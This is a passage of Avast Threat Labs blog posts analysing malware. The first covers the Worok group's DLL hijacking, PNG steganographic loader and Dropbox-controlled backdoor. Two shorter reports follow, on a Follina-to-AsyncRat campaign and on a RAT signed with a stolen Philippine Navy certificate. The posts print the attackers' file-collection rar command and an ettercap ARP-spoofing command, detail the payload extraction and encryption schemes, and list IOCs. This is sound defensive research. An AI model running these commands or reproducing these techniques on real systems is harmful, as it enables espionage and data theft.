On system start, WmiApSrv loads vmStatsProvider.dll, which tries to call vmGuestLib.dll from %ProgramFiles%\VMware\VMware Tools\vmStatsProvider\win32 as the first one. However, the original library is located at %SYSTEMROOT%\System32. Hence, if the attackers place vmGuestLib.dll into the %ProgramFiles% location, it also leads to DLL hijacking.

These two approaches are probable scenarios of how CLRLoader can be executed, and the compromise chain shown in Figure 1 launched. The elegance of this approach is that attackers do not have to create a new service that may reveal suspicious activities. The attackers abuse only export functions of hijacked DLLs, whose empty reimplementation does not cause an error or any other indicator of compromise. Moreover, the persistence of CLRLoader is ensured by the legitim Windows services.

CLRLoader

CLRLoader is a DLL file written in Microsoft Visual C++. It implements the DllMain method, which is responsible for loading the next stage (.NET variant of PNGLoader). The rest of the exported functions correspond to the interfaces of the hijacked DLLs, but the implementation of the export functions is empty. So, invoking this function does not cause a crash in the calling processes. Just for completeness, the hijacked files also contain digital signatures of the original DLL files; naturally, the signature is invalid.

CLRLoader is activated by calling LoadLibraryExW from an abused process/service. LoadLibraryExW is called with zero dwFlags parameters, so the DllMain is invoked when the malicious DLL is loaded into the virtual address space. An example of the CLRLoader code can be seen in Figure 3.

Figure 3. DllMain of hijacked DLL

CLRLoader checks the presence of the .NET DLL file containing PNGLoader, creates a mutex, and finally executes PNGLoader via CorBindToRuntimeEx API.

We recognized two variants of PNGLoader with the entry points as follow:

  • Jsprofile.Jspfilter (Setfilter)
  • pngpcd.ImageCoder (PngCoder)

PNGLoader

The second stage (PNGLoader) is loaded by CLRLoader or, as reported by ESET, by PowHeartBeat. We do not see any code deploying PNGLoader on infiltrated systems yet, but we expect to see it in a similar manner as the lateral movement.

PNGLoader is a loader that extracts bytes from PNGs files and reconstructs them into an executable code. PNGLoader is a .NET DLL file obfuscated utilizing .NET Reactor; the file description provides information that mimics legitimate software such as Jscript Profiler or Transfer Service Proxy.

The deobfuscated PNGLoader code includes the entry point (Setfilter) invoked by CLRLoader. There is a hardcoded path loader_path that is searched for all PNG files recursively. Each .png file is verified to the specific bitmap attributes (height, width) and steganographically embedded content (DecodePng). The Setfilter method is shown in Figure 4.

Figure 4. The Setfilter method of PNGLoader

The steganographic embedding relies on one of the more common steganographic techniques called least-significant bit (LSB) encoding. In general, this method embeds the data in the least-significant bits of every pixel. In this specific implementation, one pixel encodes a nibble (one bit per each alpha, red, green, and blue channel), i.e. two pixels contain a byte of hidden information, as illustrated in Figure 5. While this method is very easy to detect by a simple statistical analysis, such change in pixel value is hardly perceivable by the naked eye.

Figure 5. Byte reconstruction from 2 pixels

The steganographically embedded content is then extracted in four steps as follows.

  • The first 16 bytes (32 pixels) of the PNG file are extracted, and the first 8 bytes must match a magic number. This check is performed due to the computational complexity necessary to pull the rest of the pixels (approx. hundreds of thousands of pixels). The following 8 bytes then represent the length of the embedded payload.
  • The following extracted data is an encrypted payload in Gzip format.
  • The extracted payload is decrypted using a multiple-byte XOR hard-coded in PNGLoader.
  • The result of XORing is Gzip data that is un-gzipped.

The result of these steps is the final payload steganographically embedded in the PNG file.

Steganographically Embedded Payload

If PNGLoader successfully processes (extract → decode → unpack) the final payload, it is compiled in runtime and executed immediately. Our telemetry has picked up two variants of PNGLoader working with the magic numbers recorded in Figure 6.

Figure 6. Data structure embedded in PNG bitmap

The first payload implementation is a PowerShell script, as demonstrated by the code fragment of PNGLoader in Figure 7. Like our ESET colleagues, we have no sample of this payload yet, but we expect a similar function as the second payload implementation described below.

Figure 7. Code fragment of PNGLoader executing the PowerShell payload

The second payload implementation is .NET C# compiled and executed via the CompileAssemblyFromSource method of the CSharpCodeProvider class, see Figure 8.

Figure 8. Execution of C# payload embedded in PNG bitmap

The .NET C# payload has a namespace Mydropbox, class Program, and method Main. The namespace indicates that the payload operates with DropBox. Our telemetry captured a few PNG files, including the steganographically embedded C# payload.

PNG Files

At first glance, the PNG pictures look innocent, like a fluffy cloud; see Figure 9. Our telemetry has captured three PNG pictures with the following attributes: 

  • Size: 1213 x 270 (px)
  • Bit Depth: 8, Color Type: 6 (RGB + Alpha)
Figure 9. Malicious PNG file with steganographically embedded C# payload

As we mentioned before, malware authors rely on LSB encoding to hide malicious payload in the PNG pixel data, more specifically in LSB of each color channel (Red, Green, Blue, and Alpha). Let us have a look at their bit-planes. Figure 10 shows one of the higher bit planes for each color channel; notice that each of these images looks far from random noise. If we had a look at an image without data embedded in its LSB, we would usually see similar patterns.

Figure 10. One of the RGB bit-planes without hidden data

Now, to put it into contrast, let us have a look at LSB bit-planes. Figure 11 shows LSB bit-planes for every channel of the PNG image with the embedded encrypted (and compressed) payload. Recall that both encryption and compression should usually increase the entropy of the image. Therefore, it should be no surprise that LSB bit-planes of such an image look like random noise. It is evident that the whole canvas of LSB bit-planes is not used.

Figure 11. Zero (LSB) bit-plains channels with embedded data

The payload occupies only pixels representing the payload size, and the rest are untouched; see the algorithm below.

In this specific case, the PNG files are located in C:\Program Files\Internet Explorer, so the picture does not attract attention because Internet Explorer has a similar theme as Figure 12 shows.

Figure 12. Example of graphic Internet Explorer theme

DropBoxControl

At this time, we can extend the ESET compromise chain by the .NET C# payload that we call DropBoxControl – the third stage, see Figure 13.

Figure 13. Extended compromise chain

DropBoxControl is a backdoor that communicates with the attackers via the DropBox service. Noteworthy, the C&C server is a DropBox account, and whole communications, such as commands, uploads, and downloads, are performed using regular files in specific folders. Therefore, the backdoor commands are represented as files with a defined extension. DropBoxControl periodically checks the DropBox folder and executes commands based on the request files. The response for each command is also uploaded to the DropBox folder as the result file.

The text below describes the individual DropBoxControl components and the whole backdoor workflow.

DropBox API

DropBoxControl implements the DropBox communication by applying the standard API via HTTP/POST. There is a dedicated class, DropBoxOperation, wrapping the API with the method summarized in Table 1. A DropBox API key, sent in the HTTP header, is hard-coded in the DropBoxControl sample but can be remotely changed.

DropBoxControl MethodAPI
DropBox_FileDownloadhttps://content.dropboxapi.com/2/files/download
DropBox_DataUploadhttps://content.dropboxapi.com/2/files/upload
DropBox_FileDeletehttps://api.dropboxapi.com/2/files/delete_v2
DropBox_GetFileListhttps://api.dropboxapi.com/2/files/list_folder
Table 1. DropBox API implemented by DropBoxControl
Commands

The attackers control the backdoor through ten commands recorded in Table 2.

CommandDescription
cmdRun cmd /c <param> & exit, the param is sent by the attackers.
exeExecute a defined executable with specific parameters.
FileUploadDownload data from the DropBox to a victim’s machine.
FileDownloadUpload data from a victim’s machine to the DropBox.
FileDeleteDelete data from a victim’s machine.
FileRenameRename data from a victim’s machine.
FileViewSent file information (name, size, attributes, access time) about all victim’s files in a defined directory
ChangeDirSet a current directory for the backdoor
InfoSend information about a victim’s machine to the DropBox
ConfigUpdate a backdoor configuration file; see Configuration
Table 2. Backdoor commands

The Info command sends basic information about an infiltrated system as follows:

  • ClientId hard-coded in each DropBoxControl sample
  • Version of DropBoxControl sample (seen 1.1.2.0001)
  • Hostname of a victim’s machine
  • List of all victim’s IPs
  • Version and file size of explorer.exe
  • Windows architecture
  • List of hard drivers, including total size, available free space, and drive type
  • The current time of victim’s machine
Configuration

DropBoxControl, the object of this study, uses three files located on C:\Program Files\Internet Explorer. The file names try to look legitimate from the perspective of the Internet Explorer folder.

ieproxy.dat

This file contains the DropBoxControl configuration that is encrypted. It configures four variables as follows:

  • DropboxId: API key used for authorization
  • Interval: how often the DropBox disk is checked
  • UpTime/DownTime: defines the time interval when the backdoor is active (seen 7 – 23)

See the example of the configuration file content:
Bearer WGG0iGT****AAGkOdrimId9***QfzuwM-nJm***R8nNhy,300,7,23

iexplore.log

The iexplore.log file is a log file of DropBoxControl which records most actions like contacting the DropBox, downloading/uploading files, configuration loading, etc. Log entities are logged only if a sqmapi.dat file exists. The login engine is curiously implemented since the log file is not encrypted and contains decrypted data of the ieproxy.dat file.

Encryption

DropBoxControl encrypts the configuration file (actually without effect), and the DropBox communication. The config file is encrypted using multi-byte XOR with a hard-coded key (owe01zU4). Although the API communication is encrypted via HTTPS, data stored on the DropBox is encrypted by its own algorithm.

The data is encrypted using another hard-coded byte array (hexEnc), TaskId, and ClientId. Moreover, TaskId is used as an index to the hexEnc array, and the index is salted with ClientId in each iteration; see Figure 14. It is similar to the algorithm used by PowHeartBeat, as described in the ESET report.

Figure 14. Encryption algorithm used for DropBox files
DropBox Files

As we mentioned above, the communication between the backdoors and the attackers is performed using the DropBox files. In general, DropBox files that contain valuable information are encrypted. Each file, in addition to the data itself, also includes flags, the task type (command), and other metadata, as seen in Figures 15 and Table 3.

Figure 15. The file structure of DropBox files
ItemLengthDescription
EncType1Flag – data in the file is encrypted
GzipType1Flag – data in the file is gzipped
TaskType2Command type
DataLen4Data length
Table 3. DropBox file header

Returning to the DropBox files, we explore a DropBox file structure of the DropBox account. A root folder includes folders named according to the ClientId that is hard-coded in the DropBoxControl sample; more precisely, in the PNG file.

Each client folder holds a time.txt file which includes a number that is a count of the backdoor iteration. One iteration means contacting and processing an appropriate client folder in the DropBox repository.

The attackers specify the task type and eventual parameters. The task type and parameters are then packed using the file header and uploaded into the appropriate client folder as a request file (.req). Further analysis found that the backdoor processes its .req files and creates a result file (.res) as a response for each request file. The result file has the same file structure shown in Figure 15, but data, data length, and task type have different values, since returned data contains requested (stolen) information.

Comparing all DropBox folders (Figure 16), we determined the name of the request and result files in this form: [0-9]+-[0-9]+. The filename is used for request/response identification and also for data encrypting.

For example, let’s use the request file name 31-1233.req. The IDMessage is 31-1233 and TaskId is 1233. So, the data is encrypted using the ClientId and TaskId, plus hard-coded hexEnc; see Encryption.

Figure 16. List of DropBox files
DropBoxControl Workflow

We defined and described the basic functionality of DropBoxControl in the sections above. Therefore, we can summarize all this knowledge into a backdoor workflow and outline the whole process of data collecting, uploading, downloading, and communicating with the DropBox repository.

In the beginning, PNGLoader extracts the stenographically embedded DropBoxControl and invokes the Main method of the C# Mydropbox.Program class. DropBoxControl then decrypts and loads the configuration file containing the DropBox API key. Most of the actions are recorded in the log file.

If the current time is between UpTime and DownTime interval, DropBoxControl is active and starts the main functionality. It contacts the DropBox repository and uploads the time.txt file into the client folder. If the time.txt upload is successful, the backdoor downloads a list of all files stored in the client folder. The file list is iterated, and each request (.req) file is downloaded and processed based on the tasks type (command). DropBoxControl executes the command and creates the result file (.res) with the requested information. The resulting encrypted file is uploaded back into the client folder. Finally, the processed request (.req) file is deleted.

Victimology

The victims we saw targeted in this campaign are similar to those that ESET saw. The victims of this campaign were companies and government institutions in Asia and North America, namely Mexico. Vietnam and Cambodia are the other countries affected by DropBoxControl. One of the DropBoxControl connections was monitored from an IP associated with the Ministry of Economic Development of Russia.

Discussion

The third stage of the compromise chain is represented by the C# implementation of DropBoxControl. The DropBoxControl functionality allows attackers to control and spy on victims’ machines. Moreover, the backdoor has access to the Program Files folder, so we expect it to run under administrator privileges. The most common command observed in log files is obtaining information about victims’ files, followed by data collecting.

The typical command for the data collecting is via the cmd command; see the example below:

rar.exe a -m5 -r -y -ta20210204000000 -hp1qazxcde32ws -v2560k Asia1Dpt-PC-c.rar c:\\*.doc c:\\*.docx c:\\*.xls c:\\*.xlsx c:\\*.pdf c:\\*.ppt c:\\*.pptx c:\\*.jpg c:\\*.txt >nul

The attacks focus on collecting all files of interest, such as Word, Excel, PowerPoint, PDF, etc. They recursively search the files in the C:\ drive and pack them into an encrypted rar archive, split into multiple files.

Another command decrypted from the request file executes Ettercap, which sniffs live network connections using man-in-the-middle attacks; see the command below:

ettercap.exe -Tq -w a.cap -M ARP /192.168.100.99/ //

The attackers can sniff network communications and intercept user credentials sent via, e.g., web pages.

In short, DropBoxControl is malware with backdoor and spy functionality.

DropBox Account

Our telemetry has captured these three DropBox APIs:

Bearer gg706X***************Ru_43QAg**********1JU1DL***********ej1_xH7e
Bearer ARmUaL***************Qg02vynP**********ASEyQa***********deRLu9Gx
Bearer WGG0iG***************kOdrimId**********ZQfzuw***********6RR8nNhy

Two keys are registered to “Veronika Shabelyanova” (vershabelyanova1@gmail[.]com) with Chinese localization. The email is still active, as well as the DropBox repository. The user of the email is a Slavic transcription of “Вероника Шабелянова”.

The third DropBox repository is connected with a Hong Kong user “Hartshorne Yaeko” (yaekohartshornekrq11@gmai[l].com)

DropBox Files

We are monitoring the DropBox repositories and have already derived some remarkable information. The DropBox accounts were created on 11 July 2019 based on README files created on account’s creation.

At this time, there is only one DropBox repository that seems to be active. It contains seven folders with seven time.txt files, so there are seven active DropBoxControl instances, since the time.txt files have integers that are periodically incremented; see DropBox Files. Moreover, the integer values indicate that the backdoors run continuously for tens of days. Regarding the backdoor commands, we guess the last activity that sent request files was on 1 June 2022, also for seven backdoors. Finally, the total count of folders representing infiltrated machines equals twenty-one victims.

In April 2022, the attackers uploaded a Lua script implementing the nmap Library shortport searching for Telnet services using s3270 to control IBM mainframes; see the script below.

Code Quality of DropBoxControl

While we usually refrain from commenting on the code quality, in this case it deserves mentioning as the code quality is debatable at best and not every objection can be blamed on obfuscation.

The code contains a lot of redundant code; both duplicate code and code that serves no function. An indication of unfamiliarity with C# is usage of one’s own implementation of serialization/deserialization methods instead of using C# build-in functions. The threading code does not rely on usual synchronization primitives such semaphores, mutexes, etc. but rather uses bool flags with periodic checks of thread states. The code also contains parts that are presumably copied from API documentation. For instance, the implementation of DropBox_FileDownload contains the same comment as in the DropBox documentation; see the illustration below.

Another weird quirk is the encryption method for the configuration file. The DropBoxControl author has attempted to obfuscate the configuration in the ieproxy.dat file because the API key is sensitive information. However, when the config file is decrypted and applied, the configuration content is logged into the iexplore.log file in plain text.

In other words, the whole DropBoxControl project looks like a school project. Authors do not adhere to usual coding practices, rely on their own implementation of common primitives, and reuse code from documentation examples. This leads us to an assessment that DropBoxControl authors are different from authors of CLRLoader and PNGLoader due to significantly different code quality of these payloads.

Conclusion

The purpose of this study has been to confirm the assumptions of our fellow researchers from ESET published in the article about the Worok cyberespionage group. Our research managed to extend their compromise chain, as we have managed to find artifacts that fit the chain accompanying the samples in question.

We have described probable scenarios of how the initial compromise can be started by abusing DLL hijacking of Windows services, including lateral movement. The rest of the compromise chain is very similar to the ESET description.

The key finding of this research is the interception of the PNG files, as predicted by ESET. The stenographically embedded C# payload (DropBoxControl) confirms Worok as the cyberespionage group. They steal data via the DropBox account registered on active Google emails.

The prevalence of Worok’s tools in the wild is low, so it can indicate that the toolset is an APT project focusing on high-profile entities in private and public sectors in Asia, Africa, and North America.

Appendix

DropBoxControl Log

[02:00:50]:[+]Main starts.
[02:00:50]:[+]Config exists.
[02:00:50]:[__]DecryptContent is 1,Bearer gg706Xqxhy4*****************gQ8L4OmOLdI1JU1DL**********1ej1_xH7e#,300,7,23
[10:39:40]:[+]In work time.
[10:39:42]:[UPD] UploadData /data/2019/time.txt Starts!
[10:40:08]:[UPD] UploadData /data/2019/time.txt Success!
[10:40:10]:[UPD] UploadData Ends!
[10:40:10]:[+]Get Time.txt success.
[10:40:11]:[+] DropBox_GetFileList Success!
[10:40:11]:[DOWN] DownloadData /data/2019/31-3.req Starts!
[10:40:13]:[DOWN] DownloadData /data/2019/31-3.req Success!
[10:40:13]:[DOWN] DownloadData Ends!
[10:40:26]:[UPD] UploadData /data/2019/31-3.res Starts!
[10:40:27]:[UPD] UploadData /data/2019/31-3.res Success!
[10:40:27]:[UPD] UploadData Ends!
[10:40:27]:[DEL] Delete /data/2019/31-3.req  Starts!
[10:40:28]:[DEL] Delete /data/2019/31-3.req Success!
[10:40:28]:[DEL] Delete Ends!
[10:40:28]:[DOWN] DownloadData /data/2019/31-4.req Starts!
[10:40:29]:[DOWN] DownloadData /data/2019/31-4.req Success!
[10:40:29]:[DOWN] DownloadData Ends!
[10:40:34]:[UPD] UploadData /data/2019/31-4.res Starts!
[10:40:36]:[UPD] UploadData /data/2019/31-4.res Success!
[10:40:36]:[UPD] UploadData Ends!
[10:40:36]:[DEL] Delete /data/2019/31-4.req  Starts!
[10:40:36]:[DEL] Delete /data/2019/31-4.req Success!
[10:40:36]:[DEL] Delete Ends!
[10:40:36]:[DOWN] DownloadData /data/2019/31-5.req Starts!
[10:40:37]:[DOWN] DownloadData /data/2019/31-5.req Success!
[10:40:37]:[DOWN] DownloadData Ends!
[10:40:42]:[UPD] UploadData /data/2019/31-5.res Starts!
[10:40:43]:[UPD] UploadData /data/2019/31-5.res Success!
[10:40:43]:[UPD] UploadData Ends!
[10:40:43]:[DEL] Delete /data/2019/31-5.req  Starts!
[10:40:44]:[DEL] Delete /data/2019/31-5.req Success!
[10:40:44]:[DEL] Delete Ends!
[10:40:44]:[DOWN] DownloadData /data/2019/31-7.req Starts!
[10:40:44]:[DOWN] DownloadData /data/2019/31-7.req Success!
[10:40:44]:[DOWN] DownloadData Ends!
[10:40:49]:[UPD] UploadData /data/2019/31-7.res Starts!
[10:40:50]:[UPD] UploadData /data/2019/31-7.res Success!
[10:40:50]:[UPD] UploadData Ends!
[10:40:50]:[DEL] Delete /data/2019/31-7.req  Starts!
[10:40:52]:[DEL] Delete /data/2019/31-7.req Success!
[10:40:52]:[DEL] Delete Ends!

Task Type Values
CommandTask Type
Cmd_Request0x01
Cmd_Response0x02
Exe_Request0x03
Exe_Response0x04
FileUpload_Request0x05
FileUpload_Response0x06
FileDownload_Request0x07
FileDownload_Response0x08
FileView_Request0x09
FileView_Response0x0A
FileDelete_Request0x0B
FileDelete_Response0x0C
FileRename_Request0x0D
FileRename_Response0x0E
ChangeDir_Request0x0F
ChangeDir_Response0x10
Info_Request0x11
Info_Response0x12
Config_Request0x13
Config_Response0x14
IOCs

PNG file with steganographically embedded C# payload

29A195C5FF1759C010F697DC8F8876541651A77A7B5867F4E160FD8620415977
9E1C5FF23CD1B192235F79990D54E6F72ADBFE29D20797BA7A44A12C72D33B86
AF2907FC02028AC84B1AF8E65367502B5D9AF665AE32405C3311E5597C9C2774

DropBoxControl

1413090EAA0C2DAFA33C291EEB973A83DEB5CBD07D466AFAF5A7AD943197D726

References

[1] Worok: The big picture
[2] Lateral Movement — SCM and DLL Hijacking Primer
[3] Dropbox for HTTP Developers

The post PNG Steganography Hides Backdoor appeared first on Avast Threat Labs.

Outbreak of Follina in Australia

Our threat hunters have been busy searching for abuse of the recently-released zero-day remote code execution bug in Microsoft Office (CVE-2022-30190). As part of their investigations, they found evidence of a threat actor hosting malicious payloads on what appears to be an Australian VOIP telecommunications provider with a presence in the South Pacific nation of Palau.

Further analysis indicated that targets in Palau were sent malicious documents that, when opened, exploited this vulnerability, causing victim computers to contact the provider’s website, download and execute the malware, and subsequently become infected.

Key Observations

This threat was a complex multi-stage operation utilizing LOLBAS (Living off the Land Binaries And Scripts), which allowed the attacker to initialize the attack using the CVE-2022-30190 vulnerability within the Microsoft Support Diagnostic Tool. This vulnerability enables threat actors to run malicious code without the user downloading an executable to their machine which might be detected by endpoint detection.

Multiple stages of this malware were signed with a legitimate company certificate to add additional legitimacy and minimize the chance of detection.

First stage

The compromised website, as pictured in the screenshot below, was used to host robots.txt which is an executable which was disguised as “robots.txt”. We believe the name was used to conceal itself from detection if found in network logs. Using the Diagnostics Troubleshooting Wizard (msdt.exe), this file “robots.txt” was downloaded and saved as the file (Sihost.exe) and then executed.

Second Stage, Sihost.exe

When the renamed “robots.txt” – “Sihost.exe” – was executed by msdt.exe it downloaded the second stage of the attack which was a loader with the hash b63fbf80351b3480c62a6a5158334ec8e91fecd057f6c19e4b4dd3febaa9d447. This executable was then used to download and decrypt the third stage of the attack, an encrypted file stored as ‘favicon.svg’ on the same web server.

Third stage, favicon.svg

After this file has been decrypted, it is used to download the fourth stage of the attack from palau.voipstelecom.com[.]au. These files are named Sevntx64.exe and Sevntx.lnk, which are then executed on the victims’ machine.

Fourth Stage, Sevntx64.exe and Sevntx64.lnk

When the file is executed, it loads a 66kb shellcode from the AsyncRat malware family; Sevntx64.exe is signed with the same compromised certificate as seen previously in “robots.txt”.

The screenshot below shows the executable loading the shellcode.

Final Stage, AsyncRat

When the executable is loaded, the machine has been fully compromised with AsyncRat; the trojan is configured to communicate with the server palau[.]voipstelecom[.]com[.]au on port 443

AsyncRat SHA256:

aba9b566dc23169414cb6927ab5368b590529202df41bfd5dded9f7e62b91479

Screenshot below with AsyncRat configuration:

Conclusion

We highly recommend Avast Software to protect against the latest threats, and Microsoft patches to protect your Windows systems from the latest CVE-2022-30190 vulnerability.

IOCs:

item sha256
main webpage 0af202af06aef4d36ea151c5a304414a67aee18c3675286275bd01d11a760c04 
robots.txt b63fbf80351b3480c62a6a5158334ec8e91fecd057f6c19e4b4dd3febaa9d447 
favicon.svg ed4091700374e007ae478c048734c4bc0b7fe0f41e6d5c611351bf301659eee0
decrypted favicon.svg 9651e604f972e36333b14a4095d1758b50decda893e8ff8ab52c95ea89bb9f74
Sevntx64.exe f3ccf22db2c1060251096fe99464002318baccf598b626f8dbdd5e7fd71fd23f 
Sevntx64.lnk 33297dc67c12c7876b8052a5f490cc6a4c50a22712ccf36f4f92962463eb744d 
shellcode from Sevntx64.exe (66814 bytes) 7d6d317616d237ba8301707230abbbae64b2f8adb48b878c528a5e42f419133a
asyncrat aba9b566dc23169414cb6927ab5368b590529202df41bfd5dded9f7e62b91479

Bonus

We managed to find an earlier version of this malware.

file hash first seen country
Grievance Against Lawyers, Judge or Justice.doc.exe (signed) 87BD2DDFF6A90601F67499384290533701F5A5E6CB43DE185A8EA858A0604974  26.05.2022 NL, proxy
Grievance Against Lawyers, Judge or Justice (1).zip\Grievance Against Lawyers, Judge or Justice.doc.exe 0477CAC3443BB6E46DE9B904CBA478B778A5C9F82EA411D44A29961F5CC5C842 18.05.2022 Palau, previous victim

Forensic information from the lnk file:

field value
Application Sevntx64.exe
Accessed time 2022-05-19 09:34:26
Birth droid MAC address 00:0C:29:59:3C:CC
Birth droid file ID 0e711e902ecfec11954f000c29593ccc
Birth droid volume ID b097e82425d6c944b33e40f61c831eaf
Creation time 2022-05-19 10:29:34
Drive serial number 0xd4e21f4f
Drive type DRIVE_FIXED
Droid file ID 0e711e902ecfec11954f000c29593ccc
Droid volume ID b097e82425d6c944b33e40f61c831eaf
File flags FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_READONLY
Known folder ID af2448ede4dca84581e2fc7965083634
Link flags EnableTargetMetadata, HasLinkInfo, HasRelativePath, HasTargetIDList, HasWorkingDir, IsUnicodeLocal
base path C:\Users\Public\Documents\Sevntx64.exe
Location Local
MAC address 00:0C:29:59:3C:CC
Machine identifier desktop-eev1hc3
Modified time 2020-08-19 04:13:44
Relative path .\Sevntx64.exe
Size 1543
Target file size 376368
Working directory C:\Users\Public\Documents

The post Outbreak of Follina in Australia appeared first on Avast Threat Labs.

Avast Finds Compromised Philippine Navy Certificate Used in Remote Access Tool

28 March 2022 at 11:25

Avast Threat Intelligence Team has found a remote access tool (RAT) actively being used in the wild in the Philippines that uses what appears to be a compromised digital certificate belonging to the Philippine Navy. This certificate is now expired but we see evidence it was in use with this malware in June 2020.  

Based on our research, we believe with a high level of confidence that the threat actor had access to the private key belonging to the certificate.

We got in touch with CERT-PH, the National Computer Emergency Response Team for the Philippines to help us contact the navy. We have shared with them our findings. The navy security team later let us know that the incident has been resolved and no further assistance was necessary from our side.

Because this is being used in active attacks now, we are releasing our findings immediately so organizations can take steps to better protect themselves. We have found that this sample is now available on VirusTotal.

Compromised Expired Philippine Navy Digital Certificate

In our analysis we found the sample connects to dost[.]igov-service[.]net:8443 using TLS in a statically linked OpenSSL library.

A WHOIS lookup on the C&C domain gave us the following:

The digital certificate was pinned so that the malware requires the certificate to communicate.

When we checked the digital certificate used for the TLS channel we found the following information:

Some important things to note:

Based on our research, we believe with a high level of confidence that the threat actor had access to the private key belonging to the certificate.

While the digital certificate is now expired we see evidence it was in use with this malware in June 2020. 

The malicious PE file was found with filename: C:\Windows\System32\wlbsctrl.dll and its hash is: 85FA43C3F84B31FBE34BF078AF5A614612D32282D7B14523610A13944AADAACB.

In analyzing that malicious PE file itself, we found that the compilation timestamp is wrong or was edited. Specifically, the TimeDateStamp of the PE file was modified and set to the year 2004 in both the PE header and Debug Directory as shown below:

However, we found that the author used OpenSSL 1.1.1g and compiled it on April 21, 2020 as shown below:

The username of the author was probably udste. This can be seen in the debug information left inside the used OpenSSL library.

We found that the malware supported the following commands:

  • run shellcode
  • read file
  • write file
  • cancel data transfer
  • list drives
  • rename a file
  • delete a file
  • list directory content

Some additional items of note regarding the malicious PE file:

  • All configuration strings in the malware are encrypted using AES-CBC with the exception of the mutex it uses.That mutex is used as-is without decryption: t7As7y9I6EGwJOQkJz1oRvPUFx1CJTsjzgDlm0CxIa4=.
  • When this string is decrypted using the hard-coded key it decrypts to QSR_MUTEX_zGKwWAejTD9sDitYcK. We suspect that this is a failed attempt to disguise this malware as the infamous Quasar RAT malware. But this cannot be the case because this sample is written in C++ and the Quasar RAT is written in C#.

Avast customers are protected against this malware.

Indicators of Compromise (IoC)

SHA256 File name
85FA43C3F84B31FBE34BF078AF5A614612D32282D7B14523610A13944AADAACB C:\Windows\System32\wlbsctrl.dll
Mutex
t7As7y9I6EGwJOQkJz1oRvPUFx1CJTsjzgDlm0CxIa4=
C&C server
dost[.]igov-service[.]net:8443

The post Avast Finds Compromised Philippine Navy Certificate Used in Remote Access Tool appeared first on Avast Threat Labs.

❌
❌